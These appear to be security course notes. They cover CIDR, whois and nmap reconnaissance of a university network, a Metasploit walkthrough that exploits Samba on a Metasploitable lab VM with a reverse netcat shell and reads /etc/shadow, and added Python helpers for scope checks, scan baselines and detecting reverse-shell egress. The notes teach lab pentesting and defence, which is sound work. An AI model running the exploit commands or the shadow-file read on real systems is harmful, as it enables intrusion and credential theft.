# Network Exploitation - nmap and Metasploit

## Network Recon

Finding a target device to attack depends on the hacker’s objectives and may be opportunistic or targeted.

Either way, the first step in remote exploitation is to discover the target. After all, one cannot exploit a host that does not exist! The next step consists of gathering public information about the target, including what ports are open and which applications are available over the network.

Recall an IPv4 address is specified by 4 bytes (32 bits), constituting an integer value between 0 and 2^32-1. Typically an IP address is written as four base-10 octets UUU.VVV.WWW.XXX where UUU, VVV, WWW, and XXX are in the range 0..255. For example, the IP address of uwo.ca is 129.100.0.79. The University of Western Ontario, however, administers many hosts… an entire network in fact.

We can use the CIDR notation to specify a network range. An IP range in this notation has the form UUU.VVV.WWW.XXX/YY where YY is an integer in the range 0..32 specifying how many of the top bits of the IP address are fixed.

Here are some examples:

- 129.100.0.79/24 would specify all hosts that vary in the lower 24 bits:

      129.  0.  0.  0 = 10000001.00000000.00000000.00000000
      129.255.255.255 = 10000001.11111111.11111111.11111111

- 129.100.0.79/32 would specify the single host that uwo.ca resolves to:

      129.100.  0. 79 = 10000001.01100100.00000000.01001111

- 129.100.0.79/29 specifies the 2^(32-29) = 8 hosts "closest" to uwo.ca (including itself):

      129.100.  0. 72 = 10000001.01100100.00000000.01001000
      129.100.  0. 79 = 10000001.01100100.00000000.01001111

- 129.100.0.79/0 specifies the entire IPv4 space!
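As an added example (this is not code from the original notes), the following Python works out CIDR ranges directly from the definition above: the top YY bits are fixed and the remaining 32-YY bits vary. It also includes a scope check of the kind a tester needs before touching any host, i.e. whether an address falls inside the agreed range. The addresses and prefixes used are the ones from these notes; the helper names are my own.

```python
"""Added example (not part of the original notes): CIDR arithmetic done by hand
with integer bit operations, cross-checked against Python's ipaddress module.
Sample addresses are the ones used in the notes (uwo.ca = 129.100.0.79)."""
import ipaddress


def ip_to_int(dotted: str) -> int:
    """'129.100.0.79' -> 32-bit integer; rejects malformed input."""
    octets = dotted.split(".")
    if len(octets) != 4:
        raise ValueError(f"not an IPv4 address: {dotted!r}")
    value = 0
    for o in octets:
        n = int(o)
        if not 0 <= n <= 255:
            raise ValueError(f"octet out of range: {o!r}")
        value = (value << 8) | n
    return value


def int_to_ip(value: int) -> str:
    """32-bit integer -> dotted decimal."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def to_binary(dotted: str) -> str:
    """Render an address as the dotted 8-bit groups used in the notes."""
    value = ip_to_int(dotted)
    return ".".join(f"{(value >> shift) & 0xFF:08b}" for shift in (24, 16, 8, 0))


def cidr_range(cidr: str):
    """Return (first, last, address_count) for 'A.B.C.D/YY'.

    The top YY bits are the fixed network part; the low 32-YY bits vary,
    so the block holds 2^(32-YY) addresses. A bare address means /32.
    """
    addr, _, prefix_s = cidr.partition("/")
    prefix = int(prefix_s) if prefix_s else 32
    if not 0 <= prefix <= 32:
        raise ValueError(f"prefix length out of range: {prefix}")
    host_bits = 32 - prefix
    mask = ((1 << prefix) - 1) << host_bits      # YY ones followed by 32-YY zeros
    first = ip_to_int(addr) & mask               # clear the varying bits
    last = first | ((1 << host_bits) - 1)        # set the varying bits
    # Cross-check against the standard library (strict=False tolerates host bits set).
    net = ipaddress.ip_network(f"{addr}/{prefix}", strict=False)
    assert int(net.network_address) == first and int(net.broadcast_address) == last
    return int_to_ip(first), int_to_ip(last), 1 << host_bits


def in_scope(ip: str, cidr: str) -> bool:
    """Scope check a tester runs before scanning: is ip inside the agreed cidr?"""
    first, last, _ = cidr_range(cidr)
    return ip_to_int(first) <= ip_to_int(ip) <= ip_to_int(last)


if __name__ == "__main__":
    for c in ("129.100.0.79/32", "129.100.0.79/29", "129.100.0.79/24",
              "129.100.0.79/8", "129.100.0.79/0"):
        first, last, count = cidr_range(c)
        print(f"{c:18} {first:>15} - {last:<15} ({count} addresses)")
        print(f"{'':18} {to_binary(first)}")
        print(f"{'':18} {to_binary(last)}")
    # The ARIN record later in these notes gives Western 129.100.0.0/16.
    print("129.100.0.33 in 129.100.0.0/16:", in_scope("129.100.0.33", "129.100.0.0/16"))
```

The scope check is the practical payoff: feed it the range from the engagement contract (or the whois record) and refuse to scan anything it rejects.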

### IPv6

IPv6 uses a 128-bit (16 byte) address usually represented as eight groups of 4 hexadecimal characters, for example:

```
2001:0db8:0a0b:12f0:0000:0000:0000:0001
```

which can also be expressed in a compressed form that suppresses leading zeros and collapses a run of all-zero groups into "::":

```
2001:db8:a0b:12f0::1
```


### Whois

Suppose a penetration tester is hired to perform an evaluation of The University of Western Ontario. The permission to conduct this evaluation (if it were for real) would obviously exist between the tester and Western, so the tester would first want to confirm which IP addresses belong to Western.

They can start by gathering basic public information about the domain uwo.ca with a whois query:

```
$ whois uwo.ca
Domain name:           uwo.ca
Domain status:         registered
Creation date:         2000/10/13
Expiry date:           2020/01/12
Updated date:          2010/10/15
DNSSEC:                Unsigned

Registrar:
    Name:              Webnames.ca Inc.
    Number:            70

Registrant:
    Name:              The University of Western Ontario

Administrative contact:
    Name:              Jeff Grieve
    Postal address:    Support Services Building Rm 4359
                       London ON N6A3K7 Canada
    Phone:             +1.5196612151
    Fax:               +1.5196613486
    Email:             jeffg@uwo.ca

Technical contact:
    Name:              Ed Gibson
    Postal address:    Support Services Building rm 4300
                       London ON N6A3K7 Canada
    Phone:             +1.5196612151
    Fax:               +1.5196613486
    Email:             noc@uwo.ca

Name servers:
    ns1.uwo.ca         129.100.2.12
    ns2.uwo.ca         129.100.2.51
    ns3.uwo.ca         129.100.74.79
```

Next the tester should confirm the IP range owned by Western. This is crucial for the tester not only to narrow their search space, but also to ensure they do not try to hack into a host without permission. Even if the company states its IP range in the contract, the tester would want to confirm it. The tester might first seek to determine the IP address of the company's main website:

```
$ nslookup uwo.ca
Server:   209.222.18.222

Name: uwo.ca
```


We see uwo.ca has IP address 129.100.0.79. Next we can consult the Whois database to get information about the owner of this address:

```
$ whois 129.100.0.79
# ARIN WHOIS data and services are subject to the Terms of Use

NetRange:       129.100.0.0 - 129.100.255.255
CIDR:           129.100.0.0/16
NetName:        UWO-NET
NetHandle:      NET-129-100-0-0-1
Parent:         NET129 (NET-129-0-0-0-0)
NetType:        Direct Assignment
OriginAS:
Organization:   University of Western Ontario (UWO)
RegDate:        1987-10-27
Updated:        2014-02-28
Ref:            http://whois.arin.net/rest/net/NET-129-100-0-0-1

OrgName:        University of Western Ontario
OrgId:          UWO
Address:        Information Technology Services
Address:        1393 Western Road
Address:        Rm SSB 4352
City:           London
StateProv:      ON
PostalCode:     N6G-1G9
Country:        CA
RegDate:        1987-10-27
Updated:        2012-08-31
Ref:            http://whois.arin.net/rest/org/UWO
```

Here we see Western owns a class B network (129.100.0.0/16) consisting of IPs in the range 129.100.0.0 to 129.100.255.255. We also see that Western registered uwo.ca in 1987, several years before the web was even invented! Of course they were actively using email and FTP and other early internet services.

### Ports

A port is a software abstraction: just as IP addresses are used to identify machines on a network, ports identify specific applications running on a machine. Ports can range in value from 1 to 65535.

#### Reserved Ports

Ports in the range 1 to 1023 are reserved ports, and Unix systems require that applications have root privileges to bind to these ports. This gives visitors to a site some assurance that they are connecting to a valid system service started by the system administrator, and not by some unprivileged user. For example, the typical port for ssh is 22.

## nmap

nmap is a well known network scanning tool for discovering hosts and services. It has a wide range of scanning methods and plugins.

### Passive Host Discovery

Passive scans are a good place to start gathering basic information about a host. They have the benefit of being stealthy, as they do not contact the host. Using nmap you can use the -sL "list scan" option to do reverse-DNS lookups on neighbouring IP addresses. For example:

```
$ nmap -sL www.uwo.ca/24
```


will tell you the host names of all the hosts on the network shared by www.uwo.ca (the /24 given above). This will potentially allow us to discover interesting host names, such as this one:

```
Nmap scan report for owl.uwo.ca (129.100.0.33)
```


### Active Host Discovery

Active scans are less stealthy than passive scans since they directly contact the host. This, however, lets you gain more information than you could with a passive scan alone, such as whether the host is currently online at all.

The -sn option in nmap performs basic host detection (i.e., skips the more detailed port scan).

```
$ nmap -sn <IP or hostname>/<mask>
```

The IANA maintains a number of special use domains for the purposes of basic illustrative examples in documents. One such domain is example.com, which we can use for another concrete example of nmap's basic use:

```
$ nmap -sn example.com

Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST
Nmap scan report for example.com (93.184.216.34)
Host is up (0.023s latency).
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds
```


### Port Scanning

Port scanning can be used to gain information about what kinds of software and services might be available on a host. Without specifying any options, nmap will do an initial host discovery followed by a basic port scan:

```
$ nmap example.com

Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST
Nmap scan report for example.com (93.184.216.34)
Host is up (0.022s latency).
Not shown: 993 filtered ports
PORT     STATE  SERVICE
53/tcp   closed domain
80/tcp   open   http
443/tcp  open   https
554/tcp  closed rtsp
1119/tcp closed bnetgame
1755/tcp closed wms
1935/tcp closed rtmp
```

Similarly you can use this command to discover hosts and services on your home network; substitute your internal network IP range. First you need to find your own device's IP address, which you can do in a terminal:

```
$ ifconfig
        inet6 8f80::a28:23af:fe71:b4af  prefixlen 64  scopeid 0x20<link>
        RX packets 71  bytes 15823 (15.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 2304 (2.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```


Here our IP address is 192.168.1.3, so we can proceed to scan the home network, i.e. 192.168.1.0 to 192.168.1.255, using any number of equivalent commands including:

```
nmap 192.168.1.0/24
nmap 192.168.1.3/24
nmap 192.168.1.*
```
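The scan output above has a fixed shape (a "Nmap scan report for" header per host, then one PORT/STATE/SERVICE line per port, with a VERSION column when -sV is used), which makes it easy to process. The following added example (not code from the notes) parses that output into records and then does what a defender does with a scan of their own hosts: compares the open ports against an approved baseline and reports anything unexpected. SAMPLE is constructed from the example.com scan shown above plus one made-up 8080/tcp line; the baseline is hypothetical.

```python
"""Added example, not from the notes: parse nmap's normal text output into
records and compare a host's open ports against an approved baseline.
SAMPLE is constructed: the example.com scan from the notes plus one made-up
8080/tcp line (with a -sV style version string) so the check has something to flag."""
import re

SAMPLE = """\
Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST
Nmap scan report for example.com (93.184.216.34)
Host is up (0.022s latency).
Not shown: 993 filtered ports
PORT     STATE  SERVICE    VERSION
53/tcp   closed domain
80/tcp   open   http
443/tcp  open   https
554/tcp  closed rtsp
1119/tcp closed bnetgame
1755/tcp closed wms
1935/tcp closed rtmp
8080/tcp open   http-proxy Apache httpd 2.4.18
"""

# "Nmap scan report for host (ip)"; the "(ip)" part is absent when nmap was given a bare IP.
REPORT_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?$")
# "port/proto  state  service  [version ...]"; nmap also reports combined states such as open|filtered.
PORT_RE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(open|closed|filtered|unfiltered|open\|filtered|closed\|filtered)"
    r"\s+(\S+)(?:\s+(.*\S))?\s*$"
)


def parse_nmap(text: str) -> list:
    """Return one dict per scanned host: {'host', 'ip', 'ports': [...]}."""
    reports, current = [], None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = {"host": m.group(1), "ip": m.group(2) or m.group(1), "ports": []}
            reports.append(current)
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            current["ports"].append({"port": int(port), "proto": proto, "state": state,
                                     "service": service, "version": version})
    return reports


def open_ports(report: dict) -> list:
    """(port, proto) pairs nmap reports as open or open|filtered."""
    return [(p["port"], p["proto"]) for p in report["ports"] if p["state"].startswith("open")]


def unexpected_open(report: dict, baseline: set) -> list:
    """Open ports not in the set of (port, proto) this host is approved to expose.
    Run after every scan of your own hosts, this turns nmap into a change detector."""
    return [p for p in report["ports"]
            if p["state"].startswith("open") and (p["port"], p["proto"]) not in baseline]


if __name__ == "__main__":
    report = parse_nmap(SAMPLE)[0]
    baseline = {(80, "tcp"), (443, "tcp")}   # hypothetical approved services for a web host
    print(f"{report['host']} ({report['ip']}): open {open_ports(report)}")
    for p in unexpected_open(report, baseline):
        print(f"UNEXPECTED {p['port']}/{p['proto']} {p['service']} {p['version'] or ''}".rstrip())
```

Treating open|filtered as open is deliberate: for a baseline check a port that might be reachable deserves a look, and the cost of a false positive here is one manual verification.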


The -sV option performs version detection of the services. This doesn’t always work, especially if the sys admins have taken steps to obfuscate it. In other cases we can learn which server version and OS the target is running. For example, we see eng.uwo.ca is running Windows:

```
$ nmap -sV eng.uwo.ca

Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:49 EST
Nmap scan report for eng.uwo.ca (129.100.225.244)
Host is up (0.0026s latency).
rDNS record for 129.100.225.244: ebithp8.eng.uwo.ca
Not shown: 992 filtered ports
PORT      STATE SERVICE    VERSION
22/tcp    open  tcpwrapped
80/tcp    open  http       Microsoft IIS httpd 7.0
5357/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7937/tcp  open  rpcbind
7938/tcp  open  rpcbind
8089/tcp  open  rpcbind
49153/tcp open  msrpc      Microsoft Windows RPC
49154/tcp open  msrpc      Microsoft Windows RPC
Service Info: OS: Windows
```

The -A option prints more detailed information about services, and used together with the -sS option it can be reasonably fast. Against Metasploitable, for example (a system made purposefully vulnerable to facilitate pen-testing education), this would reveal that it is running Apache 2.2.8 on Ubuntu:

```
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
```

## Metasploit and Metasploitable

Metasploit is a customizable exploitation framework for penetration testing. It provides a (somewhat) easy to use interface for managing and deploying exploits. Metasploitable is an intentionally vulnerable version of Linux which allows us to explore exploitation techniques in a sandboxed environment.

### Virtual Pen-Testing Lab

We begin by downloading Metasploitable 2 (about 800MB) and the Kali Linux VirtualBox image. Next we configure them to use an internal (virtual) network.

### Step 1: Host Discovery

The first step will be for us to discover available hosts:

```
$ nmap -sn 192.168.1.1/29

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:32 EST
Nmap scan report for 192.168.1.1
Host is up (0.00026s latency).
MAC Address: 08:00:27:CB:C4:14 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.2
Host is up (0.00020s latency).
MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)
```


Here we see a host available at 192.168.1.2

### Step 2: Port Scanning

Next we can scan 192.168.1.2 to explore its port configuration. In particular we’d like to get a little more detailed information about what application versions are running so we’ll use the -sV option.

```
$ nmap -sV 192.168.1.2

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:33 EST
Nmap scan report for 192.168.1.2
Host is up (0.00015s latency).
Not shown: 977 closed ports
PORT      STATE SERVICE     VERSION
... <additional results> ...
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Metasploitable is configured to have many ports open (to allow many possible avenues for exploitation). In particular we notice port 139 is running Samba 3.X. Interesting. You look up Samba on Wikipedia and read that:

> Some versions of Samba 3.6.3 and lower suffer serious security issues which can allow anonymous users to gain root access to a system from an anonymous connection.

### Step 3: Exploit

Initialize the Metasploit database and start msfconsole:

```
$ service postgresql start
$ msfdb init
$ msfconsole
```


Next check to make sure that the database has connected. Typing:

```
msf > db_status
```

should return:

```
[*] postgresql connected to msf3
```


The first time you run Metasploit, you should build the database cache to allow for faster searching:

```
msf > db_rebuild_cache
```


This may take 5-10 minutes, so grab a coffee, and restart msfconsole when you come back.

Next we want to search for Samba related exploits:

```
msf > search samba

Matching Modules
================

Name                                            Disclosure Date  Rank       Description
----                                            ---------------  ----       -----------

...

exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution
```


Here we see an Excellent-ranked Samba exploit which we can use. Next we load the exploit:

```
msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RPORT  139              yes       The target port

Exploit target:

Id  Name
--  ----
0   Automatic
```


We see that this exploit requires us to specify RHOST, i.e., the remote host's IP address, and RPORT, the target port:

```
msf exploit(usermap_script) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(usermap_script) > set LPORT 666
LPORT => 666
msf exploit(usermap_script) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(usermap_script) > set RPORT 139
RPORT => 139
msf exploit(usermap_script) > set TARGET 0
TARGET => 0
```


Now that the exploit is configured and ready, the final step is to specify the payload, i.e., the malicious code we wish to deliver via the exploit. We need to see which payloads are compatible by typing:

```
msf > show payloads
```


to receive a list. We’re going to use a netcat based reverse TCP shell:

```
msf > set payload cmd/unix/reverse_netcat
```


```
msf exploit(usermap_script) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.3:666
msf exploit(usermap_script) > [*] Command shell session 1 opened (192.168.1.3:666 -> 192.168.1.2:38741) at 2016-02-22 12:08:50 -0500
```


Now if we type sessions we get:

```
Active sessions
===============

Id  Type        Information  Connection
--  ----        -----------  ----------
1   shell unix               192.168.1.3:666 -> 192.168.1.2:38741 (192.168.1.2)
```
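Note the direction of the connection in that table: with a reverse TCP payload it is the target (192.168.1.2, from an ephemeral port) that connects out to the handler on LHOST:LPORT, which is exactly what a defender on the target can look for. The following added example (not part of the notes) is a small host-side egress check: it parses connection records in the shape of ss -tnp output and flags established connections that the host itself initiated to a port outside an egress allowlist, or that a shell-like process owns. The sample records are constructed to mirror the session above, not captured output; the allowlist and process list are hypothetical policy.

```python
"""Added example, not part of the notes: a host-side check for the reverse TCP
shell pattern shown above, where the compromised host opens a connection *out*
to the handler's LHOST:LPORT (here 192.168.1.3:666). SAMPLE_SS is constructed
to resemble `ss -tnp` output on the Metasploitable host 192.168.1.2; it is not
captured output. The egress allowlist and process list are hypothetical policy."""
import re

# Constructed sample: an inbound SMB session (normal for a file server), an
# outbound HTTPS fetch (normal), and the reverse shell connection back to the handler.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
ESTAB  0      0      192.168.1.2:139     192.168.1.3:51532   users:(("smbd",pid=4921,fd=27))
ESTAB  0      0      192.168.1.2:41866   93.184.216.34:443   users:(("wget",pid=5100,fd=3))
ESTAB  0      0      192.168.1.2:38741   192.168.1.3:666     users:(("nc",pid=5234,fd=3))
"""

# Ports this server may initiate connections to (hypothetical: DNS, HTTP/S, NTP).
EGRESS_ALLOW = {53, 80, 443, 123}
# Processes that should never own a network socket on a file server.
SHELL_LIKE = {"sh", "bash", "dash", "nc", "netcat"}

LINE_RE = re.compile(
    r'^(\S+)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)(?:\s+users:\(\("([^"]+)")?'
)


def parse_ss(text: str) -> list:
    """One dict per connection line; the header and unparseable lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        state, laddr, lport, raddr, rport, proc = m.groups()
        conns.append({"state": state, "laddr": laddr, "lport": int(lport),
                      "raddr": raddr, "rport": int(rport), "proc": proc})
    return conns


def suspicious_egress(conns: list) -> list:
    """Established connections that this host initiated (ephemeral local port,
    i.e. >= 1024) to a peer port outside the allowlist, or that a shell-like
    process owns. Returns (connection, [reasons]) pairs."""
    findings = []
    for c in conns:
        if c["state"] != "ESTAB":
            continue
        reasons = []
        if c["lport"] >= 1024 and c["rport"] not in EGRESS_ALLOW:
            reasons.append(f"outbound to {c['raddr']}:{c['rport']} not in egress allowlist")
        if c["proc"] in SHELL_LIKE:
            reasons.append(f"socket owned by shell-like process {c['proc']}")
        if reasons:
            findings.append((c, reasons))
    return findings


if __name__ == "__main__":
    for conn, reasons in suspicious_egress(parse_ss(SAMPLE_SS)):
        print(f"{conn['laddr']}:{conn['lport']} -> {conn['raddr']}:{conn['rport']} "
              f"({conn['proc']}): " + "; ".join(reasons))
```

The "local port >= 1024 means we initiated it" heuristic is a simplification: a service listening above 1024 (rpcbind on 7937 in the eng.uwo.ca scan, for instance) accepts inbound connections on a high local port too, so a real check should also read the listening sockets and exclude those ports. The process-name rule has no such ambiguity, which is why netcat or a shell holding a socket on a server is the stronger signal.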


So now we want to bind to the active session:

```
msf exploit(usermap_script) > sessions -i 1
[*] Starting interaction with 1...
```


After a few moments you will be able to type commands!

```
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
```